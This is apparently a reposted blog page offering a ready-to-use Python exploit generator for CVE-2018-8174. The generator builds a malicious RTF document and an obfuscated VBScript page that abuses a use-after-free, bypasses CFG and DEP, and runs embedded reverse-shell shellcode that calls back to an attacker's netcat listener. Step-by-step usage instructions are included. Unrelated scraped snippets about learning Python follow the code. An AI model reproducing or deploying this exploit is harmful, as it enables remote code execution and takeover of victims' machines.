CVE-2018-8174 EXP 0day python

usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]

Exploit for CVE-2018-8174

optional arguments: -h, --help show this help message and exit -u URL, --url URL exp url -o OUTPUT, --output OUTPUT Output exploit rtf -i IP, --ip IP ip for netcat -p PORT, --port PORT port for netcat

eg:

  1. python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
  2. put exploit.html on your server (1.1.1.1)
  3. netcat listen on [any] 4444 (2.2.2.2)

enjoy it !

POC:

  1 import argparse
  2 import struct
  3
  4 SampleRTF = R"""{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
  5 {\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\sa200\sl276\slmult1\lang9\f0\fs22{\object\objautlink\objupdate\rsltpict\objw4321\objh4321{\*\objclass htmlfile}{\*\objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000
  6 d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
  7 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
  8 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
  9 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 10 fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 11 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 12 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 13 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 14 ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b
 15 beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
 16 000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
 17 0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
 18 000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 19 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 20 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 21 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 22 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000
 23 UNICODE_URL
 24 000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000
 25 000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700
 26 NORMAL_URL
 27 0000bbbbcccc2700
 28 UNICODE_URL
 29 0000000000000000000000000000000000000000000000000000
 30 0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000
 31 0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000}
 32 }\par
 33 }
 34 """
 35
 36 SampleHTML = R"""
 37 <!doctype html>
 38 <html lang="en">
 39 <head>
 40 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 41 <meta http-equiv="x-ua-compatible" content="IE=10">
 42 <meta http-equiv="Expires" content="0">
 43 <meta http-equiv="Pragma" content="no-cache">
 44 <meta http-equiv="Cache-control" content="no-cache">
 45 <meta http-equiv="Cache" content="no-cache">
 46 </head>
 47 <body>
 48 <script language="vbscript">
 49 Dim lIIl
 50 Dim IIIlI(6),IllII(6)
 51 Dim IllI
 52 Dim IIllI(40)
 53 Dim lIlIIl,lIIIll
 54 Dim IlII
 55 Dim llll,IIIIl
 56 Dim llllIl,IlIIII
 57 Dim NtContinueAddr,VirtualProtectAddr
 58 IlII=195948557
 59 lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
 60 lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
 61 IllI=195890093
 62 Function IIIII(Domain)
 63     lIlII=0
 64     IllllI=0
 65     IIlIIl=0
 66     Id=CLng(Rnd*1000000)
 67     lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
 68     If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
 69         lIlII=lIlII-(&h86d+6447-&H219b)
 70     End If
 71     IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
 72     IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
 73     IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
 74 End Function
 75 Function lIIII(ByVal lIlIl)
 76     IIll=""
 77     For index=0 To Len(lIlIl)-1
 78         IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
 79     Next
 80     IIll=IIll &"00"
 81     If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
 82         IIll=IIll &"00"
 83     End If
 84     For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
 85         lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
 86         lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
 87         lIIII=lIIII &"%u" &lIlIll &lIIIlI
 88     Next
 89 End Function
 90 Function lIlI(ByVal Number,ByVal Length)
 91     IIII=Hex(Number)
 92     If Len(IIII)<Length Then
 93         IIII=String(Length-Len(IIII),"0") &IIII    ‘pad allign with zeros
 94     Else
 95         IIII=Right(IIII,Length)
 96     End If
 97     lIlI=IIII
 98 End Function
 99 Function GetUint32(lIII)
100     Dim value
101     llll.mem(IlII+8)=lIII+4
102     llll.mem(IlII)=8        ‘type string
103     value=llll.P0123456789
104     llll.mem(IlII)=2
105     GetUint32=value
106 End Function
107 Function IllIIl(lIII)
108     IllIIl=GetUint32(lIII) And (131071-65536)
109 End Function
110 Function lllII(lIII)
111     lllII=GetUint32(lIII)  And (&h17eb+1312-&H1c0c)
112 End Function
113 Sub llllll
114 End Sub
115 Function GetMemValue
116     llll.mem(IlII)=(&h713+3616-&H1530)
117     GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
118 End Function
119 Sub SetMemValue(ByRef IlIIIl)
120     llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
121 End Sub
122 Function LeakVBAddr
123     On Error Resume Next
124     Dim lllll
125     lllll=llllll
126     lllll=null
127     SetMemValue lllll
128     LeakVBAddr=GetMemValue()
129 End Function
130 Function GetBaseByDOSmodeSearch(IllIll)
131     Dim llIl
132     llIl=IllIll And &hffff0000
133     Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
134         llIl=llIl-65536
135     Loop
136     GetBaseByDOSmodeSearch=llIl
137 End Function
138 Function StrCompWrapper(lIII,llIlIl)
139     Dim lIIlI,IIIl
140     lIIlI=""
141     For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
142         lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
143     Next
144     StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
145 End Function
146 Function GetBaseFromImport(base_address,name_input)
147     Dim import_rva,nt_header,descriptor,import_dir
148     Dim IIIIII
149     nt_header=GetUint32(base_address+(&h3c))
150     import_rva=GetUint32(base_address+nt_header+&h80)
151     import_dir=base_address+import_rva
152     descriptor=0
153     Do While True
154         Dim Name
155         Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
156         If Name=0 Then
157             GetBaseFromImport=&hBAAD0000
158             Exit Function
159         Else
160             If StrCompWrapper(base_address+Name,name_input)=0 Then
161                 Exit Do
162             End If
163         End If
164         descriptor=descriptor+1
165     Loop
166     IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
167     GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
168 End Function
169 Function GetProcAddr(dll_base,name)
170     Dim p,export_dir,index
171     Dim function_rvas,function_names,function_ordin
172     Dim Illlll
173     p=GetUint32(dll_base+&h3c)
174     p=GetUint32(dll_base+p+&h78)
175     export_dir=dll_base+p
176     function_rvas=dll_base+GetUint32(export_dir+&h1c)
177     function_names=dll_base+GetUint32(export_dir+&h20)
178     function_ordin=dll_base+GetUint32(export_dir+&h24)
179     index=0
180     Do While True
181         Dim lllI
182         lllI=GetUint32(function_names+index*4)
183         If StrCompWrapper(dll_base+lllI,name)=0 Then
184             Exit Do
185         End If
186         index=index+1
187     Loop
188     Illlll=IllIIl(function_ordin+index*2)
189     p=GetUint32(function_rvas+Illlll*4)
190     GetProcAddr=dll_base+p
191 End Function
192 Function GetShellcode()
193     IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("REPLACE_SHELLCODE_HERE" &lIIII(IIIII("")))
194     IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
195     GetShellcode=IIlI
196 End Function
197 Function EscapeAddress(ByVal value)
198     Dim High,Low
199     High=lIlI((value And &hffff0000)/&h10000,4)
200     Low=lIlI(value And &hffff,4)
201     EscapeAddress=Unescape("%u" &Low &"%u" &High)
202 End Function
203 Function lIllIl
204     Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
205     IlllI=lIlI(NtContinueAddr,8)
206     IlIII=Mid(IlllI,1,2)
207     llllI=Mid(IlllI,3,2)
208     llIII=Mid(IlllI,5,2)
209     lIllI=Mid(IlllI,7,2)
210     IIlI=""
211     IIlI=IIlI &"%u0000%u" &lIllI &"00"
212     For IIIl=1 To 3
213         IIlI=IIlI &"%u" &llllI &llIII
214         IIlI=IIlI &"%u" &lIllI &IlIII
215     Next
216     IIlI=IIlI &"%u" &llllI &llIII
217     IIlI=IIlI &"%u00" &IlIII
218     lIllIl=Unescape(IIlI)
219 End Function
220 Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) ‘bypass cfg
221     Dim IIlI
222     IIlI=String((100334-65536),Unescape("%u4141"))
223     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
224     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
225     IIlI=IIlI &EscapeAddress(&h3000)
226     IIlI=IIlI &EscapeAddress(&h40)
227     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
228     IIlI=IIlI &String(6,Unescape("%u4242"))
229     IIlI=IIlI &lIllIl()
230     IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
231     WrapShellcodeWithNtContinueContext=IIlI
232 End Function
233 Function ExpandWithVirtualProtect(lIlll)
234     Dim IIlI
235     Dim lllllI
236     lllllI=lIlll+&h23
237     IIlI=""
238     IIlI=IIlI &EscapeAddress(lllllI)
239     IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
240     IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
241     IIlI=IIlI &EscapeAddress(&h1b)
242     IIlI=IIlI &EscapeAddress(0)
243     IIlI=IIlI &EscapeAddress(lIlll)
244     IIlI=IIlI &EscapeAddress(&h23)
245     IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
246     ExpandWithVirtualProtect=IIlI
247 End Function
248 Sub ExecuteShellcode
249     llll.mem(IlII)=&h4d ‘DEP bypass
250     llll.mem(IlII+8)=0
251     msgbox(IlII)        ‘VT replaced
252 End Sub
253 Class cla1
254 Private Sub Class_Terminate()
255     Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
256     IllI=IllI+(&h14b5+2725-&H1f59)
257     lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
258 End Sub
259 End Class
260 Class cla2
261 Private Sub Class_Terminate()
262     Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
263     IllI=IllI+(&h880+542-&Ha9d)
264     lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
265 End Sub
266 End Class
267 Class IIIlIl
268 End Class
269 Class llIIl
270 Dim mem
271 Function P
272 End Function
273 Function SetProp(Value)
274     mem=Value
275     SetProp=0
276 End Function
277 End Class
278 Class IIIlll
279 Dim mem
280 Function P0123456789
281     P0123456789=LenB(mem(IlII+8))
282 End Function
283 Function SPP
284 End Function
285 End Class
286 Class lllIIl
287 Public Default Property Get P
288 Dim llII
289 P=174088534690791e-324
290 For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
291     IIIlI(IIIl)=(&h2176+711-&H243d)
292 Next
293 Set llII=New IIIlll
294 llII.mem=lIlIIl
295 For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
296     Set IIIlI(IIIl)=llII
297 Next
298 End Property
299 End Class
300 Class llllII
301 Public Default Property Get P
302 Dim llII
303 P=636598737289582e-328
304 For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
305     IllII(IIIl)=(&h442+2598-&He68)
306 Next
307 Set llII=New IIIlll
308 llII.mem=lIIIll
309 For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
310     Set IllII(IIIl)=llII
311 Next
312 End Property
313 End Class
314 Set llllIl=New lllIIl
315 Set IlIIII=New llllII
316 Sub UAF
317     For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
318         Set IIllI(IIIl)=New IIIlIl
319     Next
320     For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
321         Set IIllI(IIIl)=New llIIl
322     Next
323     IllI=0
324     For IIIl=0 To 6
325         ReDim lIIl(1)
326         Set lIIl(1)=New cla1
327         Erase lIIl
328     Next
329     Set llll=New llIIl
330     IllI=0
331     For IIIl=0 To 6
332         ReDim lIIl(1)
333         Set lIIl(1)=New cla2
334         Erase lIIl
335     Next
336     Set IIIIl=New llIIl
337 End Sub
338 Sub InitObjects
339     llll.SetProp(llllIl)
340     IIIIl.SetProp(IlIIII)
341     IlII=IIIIl.mem
342 End Sub
343 Sub StartExploit
344     UAF
345     InitObjects
346     vb_adrr=LeakVBAddr()
347     // Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
348     vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
349     // Alert "VBScript Base: 0x" & Hex(vbs_base)
350     msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
351     // Alert "MSVCRT Base: 0x" & Hex(msv_base)
352     krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
353     // Alert "KernelBase Base: 0x" & Hex(krb_base)
354     ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
355     // Alert "Ntdll Base: 0x" & Hex(ntd_base)
356     VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
357     // Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr)
358     NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
359     // Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr)
360     SetMemValue GetShellcode()
361     ShellcodeAddr=GetMemValue()+8
362     // Alert "Shellcode Address 0x" & Hex(ShellcodeAddr)
363     SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
364     lIlll=GetMemValue()+69596
365     SetMemValue ExpandWithVirtualProtect(lIlll)
366     llIIll=GetMemValue()
367     // Alert "Executing Shellcode"
368     ExecuteShellcode
369 End Sub
370 StartExploit
371 </script>
372 </body>
373 </html>
374 """
375
376 reverseip = ‘1.1.1.1‘
377 reverseport = 4444
378
379 def create_rtf_file(url,filename):
380     NORMAL_URL = url.encode(‘hex‘)+"0"*(78-len(url.encode(‘hex‘)))
381     UNICODE_URL = "00".join("{:02x}".format(ord(c)) for c in url)
382     if len(UNICODE_URL) < 154:
383         print ‘UNICODE_URL len %d , need to pad ...‘ % len(UNICODE_URL)
384         UNICODE_URL = UNICODE_URL+"0"*(154 - len(UNICODE_URL))
385     res = SampleRTF.replace(‘NORMAL_URL‘,NORMAL_URL).replace(‘UNICODE_URL‘,UNICODE_URL)
386     f = open(filename, ‘w‘)
387     f.write(res)
388     f.close()
389     print "Generated "+filename+" successfully"
390
391
392 def rev_shellcode(ip,port):
393     ip = [int(i) for i in ip.split(".")]
394     buf =  ""
395     buf += "\xfc\xe9\x8a\x00\x00\x00\x5d\x83\xc5\x0b\x81\xc4\x70"
396     buf += "\xfe\xff\xff\x8d\x54\x24\x60\x52\x68\xb1\x4a\x6b\xb1"
397     buf += "\xff\xd5\x8d\x44\x24\x60\xeb\x5c\x5e\x8d\x78\x60\x57"
398     buf += "\x50\x31\xdb\x53\x53\x68\x04\x00\x00\x08\x53\x53\x53"
399     buf += "\x56\x53\x68\x79\xcc\x3f\x86\xff\xd5\x85\xc0\x74\x59"
400     buf += "\x6a\x40\x80\xc7\x10\x53\x53\x31\xdb\x53\xff\x37\x68"
401     buf += "\xae\x87\x92\x3f\xff\xd5\x54\x68\x44\x01\x00\x00\xeb"
402     buf += "\x39\x50\xff\x37\x68\xc5\xd8\xbd\xe7\xff\xd5\x53\x53"
403     buf += "\x53\x8b\x4c\x24\xfc\x51\x53\x53\xff\x37\x68\xc6\xac"
404     buf += "\x9a\x79\xff\xd5\xe9\x41\x01\x00\x00\xe8\x9f\xff\xff"
405     buf += "\xff\x72\x75\x6e\x64\x6c\x6c\x33\x32\x2e\x65\x78\x65"
406     buf += "\x00\xe8\x71\xff\xff\xff\xe8\xc2\xff\xff\xff\xfc\xe8"
407     buf += "\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
408     buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
409     buf += "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
410     buf += "\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c"
411     buf += "\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b"
412     buf += "\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac"
413     buf += "\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b"
414     buf += "\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c"
415     buf += "\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
416     buf += "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
417     buf += "\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73"
418     buf += "\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
419     buf += "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5"
420     buf += "\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0"
421     buf += "\xff\xd5\x97\x6a\x05\x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"\x68\x02\x00"
422     buf += struct.pack("!H",port)+"\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
423     buf += "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
424     buf += "\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57"
425     buf += "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44"
426     buf += "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50"
427     buf += "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc"
428     buf += "\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08"
429     buf += "\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95"
430     buf += "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05"
431     buf += "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
432
433     return buf.encode("hex")
434
435 def gen_shellcode(s):
436     n = len(s)
437     i = 0
438     strs = ‘‘
439     if n % 4 == 2:
440         s=s+‘41‘
441     while i <n:
442         strs += ‘%u‘+s[i+2:i+4]+s[i:i+2]
443         i+=4
444     return strs
445
446 if __name__ == ‘__main__‘:
447     parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174")
448     parser.add_argument("-u", "--url", help="exp url", required=True)
449     parser.add_argument(‘-o‘, "--output", help="Output exploit rtf", required=True)
450     parser.add_argument(‘-i‘, "--ip", help="ip for netcat", required=False)
451     parser.add_argument(‘-p‘, "--port", help="port for netcat", required=False)
452     args = parser.parse_args()
453     url = args.url
454     filename = args.output
455     create_rtf_file(url,filename)
456     if args.ip and args.port:
457         ip = str(args.ip)
458         port = int(args.port)
459         shellcode = gen_shellcode(rev_shellcode(ip,port))
460     else:
461         shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport))
462     res = SampleHTML.replace(‘REPLACE_SHELLCODE_HERE‘,shellcode)
463     f = open(‘exploit.html‘, ‘w‘)
464     f.write(res)
465     f.close()
466
467     print "!!! Completed !!!"

原文地址:https://www.cnblogs.com/wushangguo/p/9112753.html

时间: 2024-10-18 10:32:07

CVE-2018-8174 EXP 0day python的相关文章

2018年为什么要学习Python?Python还有前景吗?

近年来,Python一直是当仁不让的开发入行首选,无论是职位数量.就业广度还是使用排行都远超其他语言,而且Python语言接近自然语言,学习起来非常的轻松简便,因此也越来越受到人们的欢迎.进入到2018年之后,Python这个行业的前景又出现了哪些变化,还有没有学习的价值?今天我们就来了解一下. 随着近几年Python的飞速发展,应用范围逐步趋于广泛,后端开发.前端开发.爬虫.金融量化分析.人工智能.自动化运维.自动化运维.大数据,Python都有涉及.Python相对其他编程语言来讲,语法较简

2018 开始认真学习点python

2018 伊始,又是春暖花开.俗语,“一年之计在于春”.又是一年立志时. 决定认真学习一些web. 本来倾向与学习NodeJS的.可是之前买的python的书太多了.就先紧手头的资源看了再说吧. 今天开始学习 web python测试驱动开发的读书笔记.不求上头条,只为记事打卡.以监督自己啦 原文地址:https://www.cnblogs.com/ahMay/p/8470595.html

python每日学习2018/1/14(python之禅)

The Zen of Python, by Tim Peters Beautiful is better than ugly. Explicit is better than implicit. Simple is better than complex. Complex is better than complicated. Flat is better than nested. Sparse is better than dense. Readability counts. Special

2018年3月python传智播客人工智能基础就业班全套视频教程

  今天笔者为大家准备了最近超级火的python人工智能全套视频教程,希望能为有志从事人工智能的小伙伴,提供一些帮助,让省下更多的时间来专注学习,能为大家提供优质的学习环境和资料是笔者的荣幸. 注: 以下所有资料均来自互联网,如有资料涉及到您的私人权益,请第一时间联系笔者,速删. 以下是相关视频资料的截图,如您有需要,请保存至百度网盘并自行下载观看. 以上视频均是笔者在学习人工智能时时在互联网上收集得来,不敢私自占为己有,特此分享.希望在对您的职业发展有所帮助,此愿足矣. 百度云分享链接:   

2018年9月Python计算机二级复习攻略

考试方式: 上机考试,考试时长 120 分钟,满分 100 分. 1. 题型及分值 单项选择题 40 分( 含公共基础知识部分 10 分). 操作题 60 分( 包括基本编程题和综合编程题). 2. 考试环境 Windows 7 操作系统,建议 Python 3.4.2 至 Python 3.5.3 版本,IDLE 开发环境. 考试内容: 一. Python 语言基本语法元素 1. 程序的基本语法元素:程序的格式框架.缩进.注释.变量.命名.保留字.数据类型.赋值语句.引用. 2. 基本输入输出

2018/11/12(python)

文件处理流程 1.打开文件,得到文件句柄并赋值给一个变量 2.通过句柄对文件进行操作 3.关闭文件 f=open('实验文件.txt',encoding='gbk') data=f.read() print (data ) f.close() 读写都是字符串形式 读 f=open('实验文件.txt','r',encoding='gbk') print(f.readlines()) f.close() 写,会覆盖原文件 f=open('实验文件.txt','w',encoding='gbk')

2018/11/18(python)

装饰器-----本质是函数,功能是为其他函数添加附加功能 原则:1.不修改被装饰函数的源代码 2.不修改被装饰函数的调用方式 装饰器=高阶函数+函数嵌套+闭包 闭包--闭包是由函数及其相关的引用环境组合而成的实体(即:闭包=函数+引用环境)(想想Erlang的外层函数传入一个参数a, 内层函数依旧传入一个参数b,def timer(func): def wrapper(): print(func) func() return# encoding:utf-8 例子1 # encoding:utf-

2018/10/31(python)

1.列表(list) 列表中的元素可以是字符串,数字,布尔值,列表还可以嵌套列表. 例   l=[1,2,3,"abc","name",[5,"pad"],b]                          <==列表中的列表被视为一个元素 列表元素可以在原来基础上修改 l=[2,"qwe",'p',1,['r',9,3,"po"],9] l[0]="ide" #改 print

2018/11/3(python)

1.九九乘法表 s="" for i in range(1,10): for j in range(1,i+1): s+=str(i)+"*"+ str(j)+"="+str(i*j)+"\t" print(s) s="" 2.print()    <==不换行 for i in range(1,10): print(i,end=" ") for i in range(1,10):